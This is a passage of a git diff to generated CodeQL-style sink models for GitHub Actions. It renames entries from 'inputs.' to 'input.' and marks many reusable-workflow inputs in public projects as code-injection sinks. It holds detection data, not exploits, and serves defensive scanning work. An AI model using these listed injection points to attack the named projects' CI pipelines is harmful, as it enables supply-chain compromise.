"code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.last_commit", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.binary_name_stem", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamrc.yml", "*", "input.ver_num", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamrc.yml", "*", "input.runner", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_vscode_ext.yml", "*", "input.ver_num", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "input.ver_num", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "input.runner", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "input.config_file", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "input.wasi_sdk_url", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "input.wamr_app_framework_url", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_lldb.yml", "*", "input.ver_num", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_lldb.yml", "*", "input.runner", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_lldb.yml", "*", "input.wasi_sdk_url", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_llvm_libraries.yml", "*", "input.arch", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_llvm_libraries.yml", "*", "input.os", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_iwasm_release.yml", "*", "input.ver_num", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml b/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml index c07d2aba0b6..6185f9d03d0 100644 --- a/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["celo-org/celo-blockchain/.github/workflows/add-docker-tag.yaml", "*", "inputs.destination-tag", "code-injection", "generated"] - - ["celo-org/celo-blockchain/.github/workflows/add-docker-tag.yaml", "*", "inputs.origin-tag", "code-injection", "generated"] \ No newline at end of file + - ["celo-org/celo-blockchain/.github/workflows/add-docker-tag.yaml", "*", "input.destination-tag", "code-injection", "generated"] + - ["celo-org/celo-blockchain/.github/workflows/add-docker-tag.yaml", "*", "input.origin-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml b/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml index 77a7eaae309..273bbc69540 100644 --- a/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cemu-project/cemu/.github/workflows/build.yml", "*", "inputs.experimentalversion", "code-injection", "generated"] \ No newline at end of file + - ["cemu-project/cemu/.github/workflows/build.yml", "*", "input.experimentalversion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml b/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml index 09299774b6a..3aac3af3cae 100644 --- a/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml @@ -3,27 +3,27 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cesiumgs/cesium-unreal/.github/workflows/testWindows.yml", "*", "inputs.unreal-program-name", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/testWindows.yml", "*", "inputs.test-package-base-name", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "inputs.unreal-program-name", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "inputs.unreal-engine-association", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "inputs.test-package-base-name", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "inputs.visual-studio-version", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "inputs.visual-studio-components", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildiOS.yml", "*", "inputs.unreal-engine-version", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildiOS.yml", "*", "inputs.unreal-program-name", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildiOS.yml", "*", "inputs.upload-package-base-name", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.unreal-engine-version", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.cmake-generator", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.cmake-platform", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.cmake-toolchain", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.upload-package-base-name", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.unreal-program-name", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.extra-choco-packages", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.visual-studio-version", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.visual-studio-components", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildMac.yml", "*", "inputs.unreal-engine-version", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildMac.yml", "*", "inputs.unreal-program-name", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildMac.yml", "*", "inputs.upload-package-base-name", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildLinux.yml", "*", "inputs.unreal-engine-version", "code-injection", "generated"] - - ["cesiumgs/cesium-unreal/.github/workflows/buildLinux.yml", "*", "inputs.clang-version", "code-injection", "generated"] \ No newline at end of file + - ["cesiumgs/cesium-unreal/.github/workflows/testWindows.yml", "*", "input.unreal-program-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testWindows.yml", "*", "input.test-package-base-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "input.unreal-program-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "input.unreal-engine-association", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "input.test-package-base-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "input.visual-studio-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "input.visual-studio-components", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildiOS.yml", "*", "input.unreal-engine-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildiOS.yml", "*", "input.unreal-program-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildiOS.yml", "*", "input.upload-package-base-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.unreal-engine-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.cmake-generator", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.cmake-platform", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.cmake-toolchain", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.upload-package-base-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.unreal-program-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.extra-choco-packages", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.visual-studio-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.visual-studio-components", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildMac.yml", "*", "input.unreal-engine-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildMac.yml", "*", "input.unreal-program-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildMac.yml", "*", "input.upload-package-base-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildLinux.yml", "*", "input.unreal-engine-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildLinux.yml", "*", "input.clang-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml b/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml index 028210d4eac..9887b8e5f3a 100644 --- a/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cgal/cgal/.github/workflows/send_email.yml", "*", "inputs.message", "code-injection", "generated"] \ No newline at end of file + - ["cgal/cgal/.github/workflows/send_email.yml", "*", "input.message", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml b/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml index 2ea83d9d94b..4c6379fd94b 100644 --- a/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml @@ -3,12 +3,12 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["checkstyle/checkstyle/.github/workflows/release-upload-all-jar.yml", "*", "inputs.version", "code-injection", "generated"] - - ["checkstyle/checkstyle/.github/workflows/release-update-xdoc-with-releasenotes.yml", "*", "inputs.version", "code-injection", "generated"] - - ["checkstyle/checkstyle/.github/workflows/release-update-github-page.yml", "*", "inputs.version", "code-injection", "generated"] - - ["checkstyle/checkstyle/.github/workflows/release-update-github-io.yml", "*", "inputs.version", "code-injection", "generated"] - - ["checkstyle/checkstyle/.github/workflows/release-publish-releasenotes-twitter.yml", "*", "inputs.version", "code-injection", "generated"] - - ["checkstyle/checkstyle/.github/workflows/release-new-milestone-and-issues-in-other-repos.yml", "*", "inputs.version", "code-injection", "generated"] - - ["checkstyle/checkstyle/.github/workflows/release-maven-prepare.yml", "*", "inputs.version", "code-injection", "generated"] - - ["checkstyle/checkstyle/.github/workflows/release-maven-perform.yml", "*", "inputs.version", "code-injection", "generated"] - - ["checkstyle/checkstyle/.github/workflows/release-copy-github-io-to-sourceforge.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["checkstyle/checkstyle/.github/workflows/release-upload-all-jar.yml", "*", "input.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-update-xdoc-with-releasenotes.yml", "*", "input.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-update-github-page.yml", "*", "input.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-update-github-io.yml", "*", "input.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-publish-releasenotes-twitter.yml", "*", "input.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-new-milestone-and-issues-in-other-repos.yml", "*", "input.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-maven-prepare.yml", "*", "input.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-maven-perform.yml", "*", "input.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-copy-github-io-to-sourceforge.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml b/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml index 69f1b740c96..35738fe6c0f 100644 --- a/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["chia-network/actions/.github/workflows/docker-build.yaml", "*", "inputs.docker-context", "code-injection", "generated"] - - ["chia-network/actions/.github/workflows/docker-build.yaml", "*", "inputs.image_subpath", "code-injection", "generated"] \ No newline at end of file + - ["chia-network/actions/.github/workflows/docker-build.yaml", "*", "input.docker-context", "code-injection", "generated"] + - ["chia-network/actions/.github/workflows/docker-build.yaml", "*", "input.image_subpath", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml b/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml index 61af1d32441..77db768cf32 100644 --- a/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["chipsalliance/chisel/.github/workflows/test.yml", "*", "inputs.scala", "code-injection", "generated"] - - ["chipsalliance/chisel/.github/workflows/test.yml", "*", "inputs.circt", "code-injection", "generated"] \ No newline at end of file + - ["chipsalliance/chisel/.github/workflows/test.yml", "*", "input.scala", "code-injection", "generated"] + - ["chipsalliance/chisel/.github/workflows/test.yml", "*", "input.circt", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml b/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml index 1532fc723aa..509de954646 100644 --- a/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml @@ -3,12 +3,12 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "inputs.test_name", "code-injection", "generated"] - - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "inputs.run_command", "code-injection", "generated"] - - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "inputs.working-directory", "code-injection", "generated"] - - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "inputs.additional_envs", "code-injection", "generated"] - - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "inputs.test_name", "code-injection", "generated"] - - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "inputs.run_command", "code-injection", "generated"] - - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "inputs.working-directory", "code-injection", "generated"] - - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "inputs.additional_envs", "code-injection", "generated"] - - ["clickhouse/clickhouse/.github/workflows/reusable_docker.yml", "*", "inputs.set_latest", "code-injection", "generated"] \ No newline at end of file + - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "input.test_name", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "input.run_command", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "input.working-directory", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "input.additional_envs", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "input.test_name", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "input.run_command", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "input.working-directory", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "input.additional_envs", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_docker.yml", "*", "input.set_latest", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml index f4a7cd26183..6e0e2865e83 100644 --- a/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cloudfoundry/cli/.github/workflows/tests-integration-reusable.yml", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file + - ["cloudfoundry/cli/.github/workflows/tests-integration-reusable.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml b/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml index 119bfeaa796..175012c10c9 100644 --- a/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "inputs.nox_session_test_sim", "code-injection", "generated"] - - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "inputs.nox_session_test_nosim", "code-injection", "generated"] - - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "inputs.group", "code-injection", "generated"] \ No newline at end of file + - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "input.nox_session_test_sim", "code-injection", "generated"] + - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "input.nox_session_test_nosim", "code-injection", "generated"] + - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "input.group", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml b/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml index 10ea343b7aa..84a834d9a1f 100644 --- a/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["codeigniter4/codeigniter4/.github/workflows/reusable-serviceless-phpunit-test.yml", "*", "inputs.extra-composer-options", "code-injection", "generated"] - - ["codeigniter4/codeigniter4/.github/workflows/reusable-serviceless-phpunit-test.yml", "*", "inputs.php-version", "code-injection", "generated"] - - ["codeigniter4/codeigniter4/.github/workflows/reusable-phpunit-test.yml", "*", "inputs.extra-composer-options", "code-injection", "generated"] - - ["codeigniter4/codeigniter4/.github/workflows/reusable-phpunit-test.yml", "*", "inputs.php-version", "code-injection", "generated"] \ No newline at end of file + - ["codeigniter4/codeigniter4/.github/workflows/reusable-serviceless-phpunit-test.yml", "*", "input.extra-composer-options", "code-injection", "generated"] + - ["codeigniter4/codeigniter4/.github/workflows/reusable-serviceless-phpunit-test.yml", "*", "input.php-version", "code-injection", "generated"] + - ["codeigniter4/codeigniter4/.github/workflows/reusable-phpunit-test.yml", "*", "input.extra-composer-options", "code-injection", "generated"] + - ["codeigniter4/codeigniter4/.github/workflows/reusable-phpunit-test.yml", "*", "input.php-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml b/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml index 6310b7155d3..2946a78cf83 100644 --- a/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["com-lihaoyi/mill/.github/workflows/run-mill-action.yml", "*", "inputs.millargs", "code-injection", "generated"] - - ["com-lihaoyi/mill/.github/workflows/run-mill-action.yml", "*", "inputs.buildcmd", "code-injection", "generated"] \ No newline at end of file + - ["com-lihaoyi/mill/.github/workflows/run-mill-action.yml", "*", "input.millargs", "code-injection", "generated"] + - ["com-lihaoyi/mill/.github/workflows/run-mill-action.yml", "*", "input.buildcmd", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml b/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml index a1de7e9a8f9..7ce68d84ca5 100644 --- a/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml @@ -3,15 +3,15 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.upgrade-plan-name", "code-injection", "generated"] - - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.chain-upgrade-tag", "code-injection", "generated"] - - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.relayer-type", "code-injection", "generated"] - - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.relayer-tag", "code-injection", "generated"] - - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.relayer-image", "code-injection", "generated"] - - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.chain-b-tag", "code-injection", "generated"] - - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.chain-a-tag", "code-injection", "generated"] - - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.chain-image", "code-injection", "generated"] - - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.test", "code-injection", "generated"] - - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.test-entry-point", "code-injection", "generated"] - - ["cosmos/ibc-go/.github/workflows/e2e-compatibility-workflow-call.yaml", "*", "inputs.test-suite", "code-injection", "generated"] - - ["cosmos/ibc-go/.github/workflows/e2e-compatibility-workflow-call.yaml", "*", "inputs.test-file-directory", "code-injection", "generated"] \ No newline at end of file + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.upgrade-plan-name", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.chain-upgrade-tag", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.relayer-type", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.relayer-tag", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.relayer-image", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.chain-b-tag", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.chain-a-tag", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.chain-image", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.test", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.test-entry-point", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-compatibility-workflow-call.yaml", "*", "input.test-suite", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-compatibility-workflow-call.yaml", "*", "input.test-file-directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml b/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml index d6e334573e4..8e3b9ccc0f8 100644 --- a/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["crowdsecurity/crowdsec/.github/workflows/publish-docker.yml", "*", "inputs.latest", "code-injection", "generated"] - - ["crowdsecurity/crowdsec/.github/workflows/publish-docker.yml", "*", "inputs.image_version", "code-injection", "generated"] \ No newline at end of file + - ["crowdsecurity/crowdsec/.github/workflows/publish-docker.yml", "*", "input.latest", "code-injection", "generated"] + - ["crowdsecurity/crowdsec/.github/workflows/publish-docker.yml", "*", "input.image_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml b/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml index eeff97a8aea..f41e2ee1246 100644 --- a/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cryptomator/cryptomator/.github/workflows/get-version.yml", "*", "inputs.version", "code-injection", "generated"] - - ["cryptomator/cryptomator/.github/workflows/av-whitelist.yml", "*", "inputs.url", "code-injection", "generated"] \ No newline at end of file + - ["cryptomator/cryptomator/.github/workflows/get-version.yml", "*", "input.version", "code-injection", "generated"] + - ["cryptomator/cryptomator/.github/workflows/av-whitelist.yml", "*", "input.url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml b/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml index 34ffd6788b1..c643a6a9fe0 100644 --- a/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["daeuniverse/dae/.github/workflows/seed-build.yml", "*", "inputs.pr-number", "code-injection", "generated"] - - ["daeuniverse/dae/.github/workflows/seed-build.yml", "*", "inputs.build-type", "code-injection", "generated"] \ No newline at end of file + - ["daeuniverse/dae/.github/workflows/seed-build.yml", "*", "input.pr-number", "code-injection", "generated"] + - ["daeuniverse/dae/.github/workflows/seed-build.yml", "*", "input.build-type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml b/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml index 8ee00d47f79..9aad213b1df 100644 --- a/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dafny-lang/dafny/.github/workflows/publish-release-reusable.yml", "*", "inputs.name", "code-injection", "generated"] - - ["dafny-lang/dafny/.github/workflows/publish-release-reusable.yml", "*", "inputs.tag_name", "code-injection", "generated"] - - ["dafny-lang/dafny/.github/workflows/integration-tests-reusable.yml", "*", "inputs.all_platforms", "code-injection", "generated"] - - ["dafny-lang/dafny/.github/workflows/integration-tests-reusable.yml", "*", "inputs.num_shards", "code-injection", "generated"] \ No newline at end of file + - ["dafny-lang/dafny/.github/workflows/publish-release-reusable.yml", "*", "input.name", "code-injection", "generated"] + - ["dafny-lang/dafny/.github/workflows/publish-release-reusable.yml", "*", "input.tag_name", "code-injection", "generated"] + - ["dafny-lang/dafny/.github/workflows/integration-tests-reusable.yml", "*", "input.all_platforms", "code-injection", "generated"] + - ["dafny-lang/dafny/.github/workflows/integration-tests-reusable.yml", "*", "input.num_shards", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml b/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml index 40b35b5c873..1906ef45379 100644 --- 